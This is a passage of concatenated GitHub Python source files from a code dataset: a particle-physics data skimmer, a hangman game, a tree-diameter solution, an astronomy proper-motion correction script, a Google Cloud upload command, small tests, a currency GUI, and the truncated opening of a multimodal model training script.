str\r\n owner: 'dt_p2p.Node'\r\n subtask_id: str\r\n task_id: str\r\n reason: message.TaskFailure.REASON\r\n","repo_name":"golemfactory/clay","sub_path":"golem/task/taskserver.py","file_name":"taskserver.py","file_ext":"py","file_size_in_byte":55435,"program_lang":"python","lang":"en","doc_type":"code","stars":2915,"dataset":"github-code","pt":"7"} +{"seq_id":"6190485317","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 1 Jan 2019\n\n@author: NikHoffStyl\n\"\"\"\n\nfrom __future__ import (division, print_function)\n\nimport time\nimport os\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nfrom 
PhysicsTools.NanoAODTools.postprocessing.framework.postprocessor import PostProcessor\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object\nfrom PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module\n\n\n\"\"\" Process command-line arguments \nThis takes command line arguments and saves them to one variable which can be later \ngiven as input to another function.\nUse --help to print details of the arguments provided.\n\n\"\"\"\nparser = ArgumentParser(description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter)\nparser.add_argument('--verbose', help='Print more data',action='store_true')\nparser.add_argument(\"--fileName\", help=\"String/Name of a file of a dataset\")\nparser.add_argument(\"--redirector\", choices=[\"xrd-global\", \"xrdUS\", \"xrdEU_Asia\", \"eos\", \"iihe\"],\n default=\"xrd-global\", help=\"Sets redirector to query locations for LFN\")\nparser.add_argument(\"--eventLimit\", type=int, default=-1,\n help=\"Set a limit to the number of events, feature is recommended when running tests.\")\nargs = parser.parse_args()\n\nclass Dataset():\n \"\"\"\n This class used to list key aspects of the dataset production\n \"\"\"\n def __init__(self, pathToFile):\n \"\"\"\n Initialise global class variables\n\n Args:\n pathToFile (string): dataset\n \"\"\"\n foldersList = pathToFile.split(\"/\")\n numberOfSteps = pathToFile.count(\"/\")\n self.storagePWD = \"/\".join(foldersList[:numberOfSteps]) + \"/\"\n self.fileName, fExt = foldersList[-1].split(\".\")\n self.type = foldersList[2]\n self.runVersion = foldersList[3]\n\n if '16' in self.runVersion: self.year = '16'\n elif '17' in self.runVersion: self.year = '17'\n elif '18' in self.runVersion: self.year = '18'\n else: self.year = ''\n\n if self.type == \"mc\": self.primaryName = foldersList[4]\n elif self.type == \"data\": self.primaryName = foldersList[4] + \"_\" + foldersList[3] + \"_\" + foldersList[6]\n else: self.channelType = \"UnknownType\"\n \n\nclass PfJetsSkimmer(Module):\n \"\"\"This class is to be used by the postprocessor to skimm a file down\n using the requirement of number of jets and a single lepton.\"\"\"\n\n def __init__(self, writeHistFile=True, eventLimit=-1):\n \"\"\" Initialise global variables\n Args:\n writeHistFile (bool): True to write file, False otherwise\n \"\"\"\n\n self.eventCounter = 0\n self.writeHistFile = writeHistFile\n self.eventLimit = eventLimit\n\n def beginJob(self, histFile=None, histDirName=None):\n \"\"\"begin job\"\"\"\n Module.beginJob(self, histFile, histDirName)\n\n def endJob(self):\n \"\"\"end Job\"\"\"\n Module.endJob(self)\n\n def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n \"\"\"add branches to file\"\"\"\n self.out = wrappedOutputTree\n pass\n\n def endFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):\n \"\"\"end file\"\"\"\n pass\n\n def analyze(self, event):\n \"\"\"process event, return True (go to next module) or False (fail, go to next event)\"\"\"\n self.eventCounter += 1\n\n if self.eventCounter > self.eventLimit > -1:\n return False\n return True\n\ndef chooseRedirector(arg):\n \"\"\"\n Sets redirector using keyword given in commandline arguments\n Args:\n arg: command line argument list\n\n Returns:\n redir: redirector, where redirector + LFN = PFN\n\n \"\"\"\n if arg.redirector == \"xrd-global\":\n redir = \"root://cms-xrd-global.cern.ch/\"\n elif arg.redirector == \"xrdUS\":\n redir = \"root://cmsxrootd.fnal.gov/\"\n elif arg.redirector == \"xrdEU_Asia\":\n 
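        # Illustrative: whichever branch is taken, the PFN is formed by plain
        # concatenation (redirector + LFN), e.g. an LFN of
        #   /store/mc/sample/file.root
        # served through this redirector becomes
        #   root://xrootd-cms.infn.it//store/mc/sample/file.root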
redir = \"root://xrootd-cms.infn.it/\"\n elif arg.redirector == \"eos\":\n redir = \"root://cmseos.fnal.gov/\"\n elif arg.redirector == \"iihe\":\n redir = \"dcap://maite.iihe.ac.be/pnfs/iihe/cms/ph/sc4/\"\n else:\n return \"\"\n return redir\n\n\ndef skimmer(arg):\n \"\"\"\n\n Args:\n file: input files of datasets\n arg: the string attached to the end of the file names\n\n Returns:\n\n \"\"\"\n redirector = chooseRedirector(arg)\n pathToFile = redirector + arg.fileName\n print (\"Running on: %s\" % pathToFile)\n\n datasetFile = Dataset(arg.fileName)\n inFile = datasetFile.fileName\n print(\"inFile: %s\" %inFile)\n print(\"self.type = %s\" %datasetFile.type)\n if datasetFile.type == \"mc\":\n OutDir = \"NanoAOD_v5/MC\" + datasetFile.year + \"/\" + datasetFile.primaryName\n elif datasetFile.type == \"data\":\n OutDir = \"NanoAOD_V5/Data/\" + datasetFile.primaryName\n else:\n print(\"Dataset type is undefined; expected 'mc' or 'data' ; none of these were given\")\n return -1\n print(\"OutDir: %s\" % OutDir)\n\n thePostFix = \"_v\"\n p99 = PostProcessor(\".\",\n [pathToFile],\n cut=\"nJet > 3 && ( nMuon >0 || nElectron >0 ) \",\n modules=[PfJetsSkimmer(eventLimit=arg.eventLimit)],\n postfix=thePostFix,\n provenance=True,\n #branchsel=\"/user/nistylia/CMSSW_9_4_10/src/TopBrussels/RemoteWork/myInFiles/kd_branchsel.txt\",\n #outputbranchsel=\"/user/nistylia/CMSSW_9_4_10/src/TopBrussels/RemoteWork/myInFiles/kd_branchsel.txt\",\n )\n print(p99.inputFiles)\n t0 = time.time()\n p99.run()\n if 'TMPDIR' in os.environ:\n if os.environ['TMPDIR'] == os.environ['PWD']:\n print(\"We are in the temporary directory, so need to copy files in pnfs\")\n cmdString = \"gfal-copy -f file://$TMPDIR/{0}{1}.root srm://maite.iihe.ac.be:8443/pnfs/iihe/cms/store/user/$USER/{2}/{0}.root\".format(inFile, thePostFix, OutDir)\n print(cmdString)\n os.system(cmdString)\n t1 = time.time()\n proc = os.getpid()\n print(\">>> Elapsed time {0:7.1f} s by process id: {1}\".format((t1 - t0), proc))\n\n else:\n print(\"This is a permanent directory so we save in current directory\")\n\ndef main(args):\n \"\"\" This is where the input files are chosen and the PostProcessor runs \"\"\"\n skimmer(args)\n\n\nif __name__ == '__main__':\n t2 = time.time()\n main(args)\n t3 = time.time()\n print(\">>>>> Total Elapsed time {0:7.1f} s \".format((t3 - t2)))\n","repo_name":"NikHoffStyl/SLJets_FourTopNanoVersion","sub_path":"Ana/scripts/qsub/SkimDASAndSave2pnfs/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":6614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10363202616","text":"#!/usr/bin/env python\n\nimport random\nimport curses\nimport traceback\nimport sys\nimport re\n\n# Define the hangman drawing function\ndef draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress):\n temp=max_incorrect_guesses/12\n screen.clear()\n screen.addstr(0, 0, '_______ ')\n screen.addstr(1, 0, '| |')\n screen.addstr(2, 0, '|') \n screen.addstr(3, 0, '|')\n screen.addstr(4, 0, '|')\n screen.addstr(5, 0, '|')\n screen.addstr(6, 0, '|')\n screen.addstr(7, 0, '|')\n screen.addstr(8, 0, '|')\n screen.addstr(9, 0, '-------')\n if incorrect_guesses>0:\n screen.addstr(2, 6, 'O')\n if incorrect_guesses>temp:\n screen.addstr(3, 6, '|')\n if incorrect_guesses>2*temp:\n screen.addstr(4, 6, '|')\n if incorrect_guesses>3*temp:\n screen.addstr(4, 5, '/')\n if incorrect_guesses>4*temp:\n screen.addstr(4, 7, '\\\\')\n if incorrect_guesses>5*temp:\n screen.addstr(5, 
6, '|')\n if incorrect_guesses>6*temp:\n screen.addstr(6, 5, '/')\n if incorrect_guesses>7*temp:\n screen.addstr(6, 7, '\\\\')\n if incorrect_guesses>8*temp:\n screen.addstr(7, 4, '/')\n if incorrect_guesses>9*temp:\n screen.addstr(7, 8, '\\\\')\n if incorrect_guesses>10*temp:\n screen.addstr(8, 3, '/')\n if incorrect_guesses>11*temp:\n screen.addstr(8, 9, '\\\\')\n\n\n screen.addstr(11, 0, ' '.join(['Available letters:'] + [l.upper() if l not in guesses else '_' for l in 'abcdefghijklmnopqrstuvwxyz']))\n screen.addstr(14, 0, ' '.join(progress))\n screen.addstr(16, 0, f'Wrong guesses left: {max_incorrect_guesses - incorrect_guesses}')\n screen.refresh()\n\ndef main(max_incorrect_guesses=12):\n # Load words from the file\n with open('words') as f:\n words = f.read().splitlines()\n\n # Filter words to include only those with 5-25 letters\n words = [word.lower() for word in words if len(word) >= 5 and len(word) <= 25]\n\n # Initialize curses\n screen = curses.initscr()\n\n # Play the game\n play_again = True\n try:\n while play_again:\n # Reset game state\n word = random.choice(words)\n progress = ['_'] * len(word)\n counter=0\n for letter in word:\n if not re.match(\"[a-z]\", letter):\n progress[counter]=letter\n counter+=1\n guesses = set()\n incorrect_guesses = 0\n draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress)\n\n # Play the game\n while '_' in progress and incorrect_guesses < max_incorrect_guesses:\n guess = ''\n while not guess.isalpha():\n guess = screen.getkey().lower()\n if guess in guesses:\n screen.addstr(12, 0, f\"You've already guessed {guess}.\")\n elif guess in word:\n screen.addstr(12, 0, 'Correct!')\n for i, letter in enumerate(word):\n if letter == guess:\n progress[i] = letter\n else:\n screen.addstr(12, 0, 'Incorrect.')\n incorrect_guesses += 1\n draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress)\n guesses.add(guess)\n draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress)\n # End the game\n if '_' not in progress:\n screen.addstr(16, 0, f'Congratulations! You guessed the word \"{word}\" with {incorrect_guesses} incorrect guesses.')\n else:\n screen.addstr(16, 0, f'Sorry, you lost. The word was \"{word}\".')\n screen.addstr(18, 0, 'Do you want to play again? (y/n)')\n play_again_input = ''\n while play_again_input not in ['y', 'n']:\n play_again_input = screen.getkey().lower()\n play_again = play_again_input == 'y'\n except:\n curses.endwin()\n traceback.print_exc()\n pass\n curses.endwin()\n\nif __name__==\"__main__\":\n max_guesses=12\n options = {}\n for i in range(1, len(sys.argv), 2):\n if sys.argv[i] in [\"-m\"]:\n try:\n max_guesses = int(sys.argv[i+1])\n except:\n print(\"Max guesses is not an integer; exiting\")\n sys.exit(1)\n main(max_guesses)\n","repo_name":"jasonbrianhall/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24371662756","text":"'''\nGiven a binary tree, you need to compute the length of the diameter of the tree. \nThe diameter of a binary tree is the length of the longest path between any two nodes in a tree. 
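For example, given the tree [1,2,3,4,5] (root 1 with children 2 and 3, where
node 2 has children 4 and 5), the diameter is 3, i.e. the number of edges on
the path 4 -> 2 -> 1 -> 3.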
\nThis path may or may not pass through the root.\n\nhttps://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/529/week-2/3293/\n\n'''\n\nclass Solution(object):\n def diameterOfBinaryTree(self, root):\n\n self.ans = 0\n \n def depth(p):\n if not p: return 0\n left, right = depth(p.left), depth(p.right)\n self.ans = max(self.ans, left+right)\n return 1 + max(left, right)\n \n depth(root)\n return self.ans","repo_name":"arsaikia/Data_Structures_and_Algorithms","sub_path":"Data Structures and Algorithms/Python/LeetCode/Diameter of Binary Tree.py","file_name":"Diameter of Binary Tree.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6204290544","text":"import os\nimport sys\nimport numpy as np\nfrom astropy.time import Time\n\n#### \n#### INPUT THE DATE of the astrometry_ref.fits file as string of 8 numbers, e.g.: '20140526' for q2237!!!!\n##########################\nref_date = '20140526' ######## q2237: '20140526', he2149: '20211005,'\n##########################\n#### \n\n######################################################################################################\n#### DO NOT CHANGE THIS FILE FROM HERE ON - IT WILL BE ACCESSED BY aligning.py VIA interp.csh!!!! ####\n######################################################################################################\n\n# switch set by aligning.py: decides whether this correction will be applied\ntxt = open(\"gaiastarpositioncorrection_bool.txt\", \"r\")\ngaiastarpositioncorrection_bool = txt.read()\ntxt.close()\n\n#print(sys.argv) # gaiaposcorrectionforaligning.py arguments\n\n# check if this program got zero arguments:\n# --> then refalignimage.data stars will be matched with gaia stars and pm's for good.data\nif len(sys.argv) == 1: # sys.argv counts pythonfilename also as argument\n if gaiastarpositioncorrection_bool == 'True':\n # print statements can be read in alignpy_consollog.txt afterwards\n print('#########################################################')\n print('# reference and gaia star and pm matching for good.data #')\n print('#########################################################')\n \n # star matching:\n \n # load isis and gaia values:\n refaligndataRA,refaligndataDEC = np.loadtxt('refalignimage.data',usecols=(0,1),unpack=True)\n #print(refaligndataRA,refaligndataDEC)\n gaiaRA,gaiaDEC,pmRA,pmDEC,pmSN = np.loadtxt('gaia_pixelpositionandpm_list.txt',skiprows=1,usecols=(0,1,2,3,4),unpack=True)\n #print(gaiaRA,gaiaDEC,pmRA,pmDEC,pmSN)\n \n # open refalignimage.data to read it and \n # open goodpm.data to write into it, i.e. 
append lines with pm:\n refalignimagedata = open('refalignimage.data','r')\n datalines = refalignimagedata.readlines()\n refalignimagedata.close()\n gooddata = open('goodpm.data','w')\n \n # match stars:\n match_counter = 0\n max_distance = 15.0 # distance in pixels must be below this to have a match\n min_pmSN = 5.0 # pmSN must be above this, to correct a star for pm (is already at at least 5 from the gaialist)\n #print(len(refaligndataRA),len(gaiaRA))\n for i in range(len(refaligndataRA)):\n # starpmRA/DEC_forgooddata will be written to good.data and:\n # if no star match: pmRA = 0.0 and pmDEC = 0.0 will be added to good.data of this star.\n starpmRA_forgooddata = 0.0\n starpmDEC_forgooddata = 0.0\n distance = np.sqrt((refaligndataRA[i]-gaiaRA)**2+(refaligndataDEC[i]-gaiaDEC)**2)\n mindex = np.argmin(distance)\n if distance[mindex] < max_distance and pmSN[mindex] > min_pmSN: \n #print(distance[mindex],refaligndataRA[i],gaiaRA[mindex],refaligndataDEC[i],gaiaDEC[mindex])\n match_counter = match_counter + 1\n starpmRA_forgooddata = pmRA[mindex]\n starpmDEC_forgooddata = pmDEC[mindex]\n #print(starpmRA_forgooddata,starpmDEC_forgooddata)\n # write pm into the end of the line of the .data-file if it does not have a pm in there yet:\n #print(datalines[i])\n if str(datalines[i])[-4:-1] == 'nan':\n datalines[i] = datalines[i].strip('\\n')+' '+str(starpmRA_forgooddata)+' '+str(starpmDEC_forgooddata)+' \\n'\n #print(datalines[i])\n gooddata.writelines(datalines[i])\n \n gooddata.close()\n \n print('matched',match_counter,'of',len(refaligndataRA),'stars with a distance smaller than',max_distance,'pixels,')\n print('a pmSN of above',min_pmSN,'and written their pmRA, pmDEC and good.data to goodpm.data')\n \n else:\n os.system('cp refalignimage.data good.data')\n # nothing changed --> registering as usual:\n # the ref star positions are unchanged and copied to good data, where they are used by isis as usual\n\n\n# check if this program got one argument:\n# --> then refalignimage.data star positions will be matched with the gaia pm's for good.data\nelif len(sys.argv) == 2:\n date = str(sys.argv[1])[24:32]\n\n if gaiastarpositioncorrection_bool == 'True':\n print('#########################################################')\n print('# daily star data correction with gaia pm for good.data #')\n print('#########################################################')\n \n #### initial test: just remove some stars from the list (the test is the third line with ####)\n #### do not activate anymore, as the first 100 stars are the 'best' ones!!!\n #### os.system('tail -n +101 good.data') # remove the first 100 stars from good.data\n #### end of test\n \n # time of daily image:\n year = str(date[0:4])\n month = str(date[4:6])\n day = str(date[6:8])\n print('good.data positions will be corrected for:',day+'.'+month+'.'+year)\n utc_string = year+'-'+month+'-'+day+'T00:00:00.000' # UTC 00:00:00.000am on day-month-year\n julian_date = Time(utc_string,format='isot',scale='utc').jd # julian date\n #print(utc_string,julian_date)\n \n # time of reference image:\n ref_date_utc = str(ref_date[0:4])+'-'+str(ref_date[4:6])+'-'+str(ref_date[6:8])+'T00:00:00.000'\n julian_ref_date = Time(ref_date_utc,format='isot',scale='utc').jd\n #print(ref_date_utc,julian_ref_date)\n \n # time differnce to refernce image in days:\n time_difference = julian_date - julian_ref_date # time difference in days\n print('time difference to astrometry_ref.fits:',time_difference,'days')\n \n # position correction:\n 
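        # Quick sanity check with illustrative numbers (not taken from the
        # data): at pixel_scale = 0.387 arcsec/px, a proper motion of
        # 100 mas/yr works out to 100/(365.25*1000*0.387) ~= 7.1e-4 px/day,
        # i.e. about 0.7 px over a 1000-day baseline. The lines below apply
        # exactly this conversion star by star.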
initial_RA,initial_DEC,pm_RA_masperyear,pm_DEC_masperyear = np.loadtxt('goodpm.data',usecols=(0,1,5,6),unpack=True)\n pixel_scale = 0.387 # in arcsec/pixel\n pm_RA_pixelperday = pm_RA_masperyear/(365.25*1000*pixel_scale)\n pm_DEC_pixelperday = pm_DEC_masperyear/(365.25*1000*pixel_scale)\n RA_shift = pm_RA_pixelperday * time_difference\n DEC_shift = pm_DEC_pixelperday * time_difference\n print('maximum calculated absolute pixel shifts:',round(np.max(np.abs(RA_shift)),4),'and',round(np.max(np.abs(DEC_shift)),4))\n corrected_RA = initial_RA + RA_shift\n corrected_DEC = initial_DEC - DEC_shift\n \n # write good.data with corrected values for isis to align properly\n # open refalignimage.data to read it and \n # open goodpm.data to write into it, i.e. append lines with pm:\n refalignimagedata_day = open('refalignimage.data','r')\n datalines_day = refalignimagedata_day.readlines()\n refalignimagedata_day.close()\n gooddata_day = open('good.data','w')\n if len(datalines_day) != len(corrected_RA):\n print('fatal error')\n sys.exit('number of lines to write and number of corrected lines are not equal')\n for i in range(len(datalines_day)):\n newgooddataline = ' '.join([str(corrected_RA[i]),str(corrected_DEC[i])]+datalines_day[i].split()[2:])+'\\n'\n gooddata_day.writelines(newgooddataline)\n gooddata_day.close()\n \n print('#########################################################') # can be read in alignpy_consollog.txt afterwards\n print('# daily star data correction of good.data has finished! #')\n print('#########################################################')\n \n else:\n # the daily correction is not happening and isis registers unchanged as before without any correction\n print('#########################################################')\n print('# NO daily star data correction and good.data unchanged #')\n print('#########################################################')\n \n \n\n# if refalignimage.data did not get zero or one argument interupt everything as it must get zero or one argument!\nelse:\n print('argument error: wrong number of arguments given to gaiaposcorrectionforaligning.py!')\n sys.exit('argument error: wrong number of arguments given to gaiaposcorrectionforaligning.py!') \n","repo_name":"sorgenfrei-c95/qsoMLdiffcurves","sub_path":"gaiaposcorrectionforaligning.py","file_name":"gaiaposcorrectionforaligning.py","file_ext":"py","file_size_in_byte":8444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27781584769","text":"import json\nimport os\nfrom googlecloudsdk.api_lib.source import capture\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.core import log\n\n\nclass Upload(base.Command):\n \"\"\"Upload a source capture from given input files.\"\"\"\n\n detailed_help = {\n 'DESCRIPTION': \"\"\"\\\n This command uploads a capture of the specified source directory to\n a Google-hosted Git repository accessible with the current project's\n credentials. 
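          For example, a hypothetical invocation (the flags are the ones
          defined below) could look like:

            $ {command} ./my-sources --capture-id=my-capture --target-path=src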
If the name of an existing capture is provided, the\n          existing capture will be modified to include the new files.\n          Otherwise a new capture will be created to hold the files.\n\n          When creating a capture, this command can also produce a source\n          context json file describing the capture.\n\n          See https://cloud.google.com/tools/cloud-debugger/ for details on\n          where to deploy the source context json file in order to enable\n          Cloud Diagnostic tools to display the captured sources.\n\n      \"\"\"\n  }\n\n  @staticmethod\n  def Args(parser):\n    parser.add_argument(\n        'source_location', metavar='PATH',\n        help=\"\"\"\\\n            The directory or archive containing the sources to capture. Files\n            and subdirectories contained in that directory or archive will be\n            added to the capture. If PATH refers to a file, the file may be\n            a Java source jar or a zip archive.\n        \"\"\")\n    parser.add_argument(\n        '--capture-id', metavar='ID',\n        completion_resource='source.captures',\n        help=\"\"\"\\\n            The ID of the capture to create or modify.\n        \"\"\")\n    parser.add_argument(\n        '--target-path', metavar='PATH', default='',\n        help=\"\"\"\\\n            The directory tree under source-location will be uploaded under\n            target-path in the capture's directory tree.\n        \"\"\")\n    parser.add_argument(\n        '--context-file', metavar='json-file-name',\n        help=\"\"\"\\\n            The name of the source context json file to produce. Defaults to\n            source-contexts.json in the current directory. If context-file names\n            a directory, the output file will be source-contexts.json in that\n            directory.\n        \"\"\")\n\n  def Run(self, args):\n    \"\"\"Run the capture upload command.\"\"\"\n\n    mgr = capture.CaptureManager()\n    result = mgr.UploadCapture(args.capture_id, args.source_location,\n                               args.target_path)\n    if args.context_file:\n      if os.path.isdir(args.context_file):\n        json_filename = os.path.join(args.context_file, 'source-contexts.json')\n      else:\n        json_filename = args.context_file\n    else:\n      json_filename = 'source-contexts.json'\n    with open(json_filename, 'w') as source_context_file:\n      json.dump(result['source_contexts'], source_context_file)\n    log.Print('Created context file {0}\\n'.format(json_filename))\n    return result\n\n  def Display(self, args, result):\n    \"\"\"This method is called to print the result of the Run() method.\n\n    Args:\n      args: The arguments that command was run with.\n      result: The value returned from the Run() method.\n    \"\"\"\n    log.Print(\n        ('Created source capture {capture.id}.\\n'\n         'Wrote {files_written} files, {size_written} bytes.\\n').\n        format(**result))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/surface/source/captures/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"36374426615","text":"import pytest\nfrom lib.present import *\n\ndef test_wrap_returns_contents():\n    present = Present()\n    result = present.wrap('toys')\n    assert result == 'toys'\n\ndef test_unwrap_returns_contents():\n    present = Present()\n    present.wrap('kitten')\n    result = present.unwrap()\n    assert result == 'kitten'\n\ndef test_wrap_returns_error_for_existing_contents():\n    present = Present()\n    present.wrap('toys')\n    with pytest.raises(Exception) as e:\n        present.wrap('puppy')\n    error_message = str(e.value)\n    assert error_message == \"A contents has already been wrapped.\"\n\ndef test_unwrap_returns_error_for_no_contents():\n    present = Present()\n    with pytest.raises(Exception) as 
e:\n        present.unwrap()\n    error_message = str(e.value)\n    assert error_message == \"No contents have been wrapped.\"\n\n    \n","repo_name":"Sabirah42/intro_bites","sub_path":"tests/test_present.py","file_name":"test_present.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21571585263","text":"from get_exchange import *\nfrom tkinter import *\n\n\nclass GUI(get_exchange):\n    def __init__(self , win):\n        super().__init__()\n        super().getInfoFromBOT()\n        super().getInfoFromCoinmill()\n\n        self.win = win\n        \n        self.win.title('Exchange Calculate')\n        \n        self.win.resizable(0,0)\n        \n        for i in self.exchange_dict:\n            exchange_message = '{} : {}'.format(i,self.exchange_dict[i])\n            Label(self.win , text = exchange_message).grid()\n        \n        Label(self.win , text = '\\nInsert Curren$y abbreviation to convert to NTD (Ex : USD 10)').grid()\n        \n        self.entry = Entry(self.win)\n        self.entry.grid()\n        self.entry.focus() \n        \n        var = StringVar()\n        result = Label(self.win , textvariable = var).grid()\n        \n        self.button = Button(self.win , text = 'Calculate Exchange' , command = lambda : self.callback(var , self.entry.get())).grid()\n\n        self.win.bind('<Return>' , lambda x: self.callback(var , self.entry.get()))\n        \n        Frame(self.win , width = 300 , height = 50).grid()\n        \n        \n        \n    def callback(self,var,user_input):\n        tmp = user_input.split()\n        if len(tmp) == 2:\n            flag = 0\n            current_currency = str(tmp[0]).upper()\n\n            try : \n                if(isinstance(float(current_currency),float)):\n                    output_message = 'Input error , insert again'\n                    flag = 1\n            except :\n                pass\n            \n            try :\n                current_value = float(tmp[1])\n            except:\n                output_message = 'Input error , insert again'\n                flag = 1\n            if not flag == 1:\n                output_message = super().calculate(current_currency,current_value)\n        else :\n            output_message = 'Input error , insert again'\n        \n        var.set(output_message)\n\n\n        \n\n\n","repo_name":"poynt2005/get_exchange","sub_path":"legacy/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74561251102","text":"from math import log\nimport os\nimport argparse\nimport datetime\nimport json\nimport time\nimport wandb\nimport numpy as np\nfrom pathlib import Path\n\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.tensorboard import SummaryWriter\nimport timm.optim.optim_factory as optim_factory\n\nimport lavin.utils.misc as misc\nfrom lavin.utils.misc import NativeScalerWithGradNormCount as NativeScaler\nfrom engine import train_one_epoch\n\nfrom lavin.utils.datasets import ScienceQADataSet, InstrcutDataSet\nfrom lavin.mm_adaptation import LaVIN\n\n# import bitsandbytes as bnb # don't need this if you don't use paged optimizer\n\n\ndef get_args():\n    parser = argparse.ArgumentParser('MAE pre-training', add_help=False)\n    parser.add_argument('--batch_size', default=2, type=int, help='Batch size per GPU (effective batch size is batch_size * accum_iter * # gpus)')\n    parser.add_argument('--accum_iter', default=2, type=int)\n    parser.add_argument('--epochs', default=20, type=int)\n    parser.add_argument('--bits', default='16bit')\n\n    # Model parameters\n    parser.add_argument('--llama_model_path', default='./data/weights/', type=str)\n    parser.add_argument('--llm_model', default='100M', type=str)\n    parser.add_argument('--use_vicuna', action='store_true')\n    parser.add_argument('--cpu_load', action='store_true')\n\n    parser.add_argument('--adapter_type', 
type=str, default='attn', choices=['block', 'attn'], help='the insert position of adapter layer')\n    # choices=['normal', 'router', 'router_block']\n    parser.add_argument('--visual_adapter_type', type=str, default='router', help='the type of adapter layer')\n    parser.add_argument('--adapter_dim', type=int, default=8, metavar='LENGTH', help='the dims of adapter layer')\n    parser.add_argument('--hidden_proj', type=int, default=128, metavar='LENGTH', help='the visual adapter dim')\n    parser.add_argument('--temperature', type=float, default=10., metavar='LENGTH', help='the temperature of router')\n    parser.add_argument('--n_prompt', type=int, default=6, metavar='LENGTH', help='the length of visual features')\n    parser.add_argument('--adapter_scale', type=float, default=1., metavar='LENGTH', help='the scales of adapter layer')\n    parser.add_argument('--drop_path', type=float, default=0., metavar='LENGTH', help='drop path')\n    parser.add_argument('--max_seq_len', type=int, default=512, metavar='LENGTH', help='the maximum sequence length')\n\n    # Optimizer parameters\n    parser.add_argument('--weight_decay', type=float, default=0.02, help='weight decay (default: 0.02)')\n    parser.add_argument('--lr', type=float, default=None, metavar='LR', help='learning rate (absolute lr)')\n    parser.add_argument('--clip_grad', type=float, default=None, metavar='clip gradient')\n    parser.add_argument('--blr', type=float, default=9e-3, metavar='LR', help='base learning rate: absolute_lr = base_lr * total_batch_size / 256')\n    parser.add_argument('--min_lr', type=float, default=0., metavar='LR', help='lower lr bound for cyclic schedulers that hit 0')\n\n    parser.add_argument('--gradient_checkpointing', action='store_true', help='saving memory costs via gradient_checkpointing')\n    parser.add_argument('--warmup_epochs', type=float, default=2, metavar='N', help='epochs to warmup LR')\n\n    # Dataset parameters\n    parser.add_argument('--data_path', default='./data/captions.json', type=str, help='dataset path')\n    parser.add_argument('--output_dir', default='./outputs/debug', help='path where to save, empty for no saving')\n    parser.add_argument('--log_dir', default='./outputs/debug', help='path where to tensorboard log')\n    parser.add_argument('--device', default='cuda', help='device to use for training / testing')\n    parser.add_argument('--seed', default=0, type=int)\n    parser.add_argument('--resume', default='', help='resume from checkpoint')\n\n    parser.add_argument('--start_epoch', default=0, type=int, metavar='N', help='start epoch')\n    parser.add_argument('--num_workers', default=2, type=int)\n    parser.add_argument('--pin_mem', action='store_true', help='Pin CPU memory in DataLoader for more efficient (sometimes) transfer to GPU.')\n    parser.add_argument('--no_pin_mem', action='store_false', dest='pin_mem')\n    parser.set_defaults(pin_mem=True)\n\n    # distributed training parameters\n    parser.add_argument('--world_size', default=1, type=int, help='number of distributed processes')\n    parser.add_argument('--local_rank', default=0, type=int)\n    parser.add_argument('--rank', default=0, type=int)\n\n    #datasets\n    parser.add_argument('--prompt_format', type=str, default='QCM-ALE', help='prompt format template')\n    parser.add_argument('--options', type=list, default=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n    parser.add_argument('--caption_file', type=str, default='./data/captions.json')\n    parser.add_argument('--data_root', type=str, default='./data')\n    parser.add_argument('--use_caption', action='store_true', help='use image captions or not')\n    
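# experiment tracking\n    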
parser.add_argument('--wandb_enable', action='store_true', help='to use wandb')\n args = parser.parse_args()\n args.clip_grad = True\n return args\n\n\ndef main(args):\n\n misc.init_distributed_mode(args)\n if misc.is_main_process() and args.wandb_enable:\n args.output_dir = args.output_dir[:-1] if args.output_dir.endswith('/') else args.output_dir\n wandb.init(project=\"lavin-original\", name=args.output_dir.split(\"/\")[-1], dir=args.output_dir, config=vars(args))\n print('Experiment name: {}'.format(wandb.run.name))\n\n device = torch.device(args.device)\n\n # fix the seed for reproducibility\n seed = args.seed + misc.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n cudnn.benchmark = True\n\n dataset_train = ScienceQADataSet(args, 'train', args.llama_model_path, args.max_seq_len)\n\n num_tasks = misc.get_world_size()\n global_rank = misc.get_rank()\n sampler_train = torch.utils.data.DistributedSampler(dataset_train, num_replicas=num_tasks, rank=global_rank, shuffle=True)\n\n print(\"Sampler_train = %s\" % str(sampler_train))\n\n log_writer = None\n\n data_loader_train = torch.utils.data.DataLoader(\n dataset_train,\n sampler=sampler_train,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=args.pin_mem,\n drop_last=True,\n )\n\n # define the model\n model = LaVIN(args)\n\n 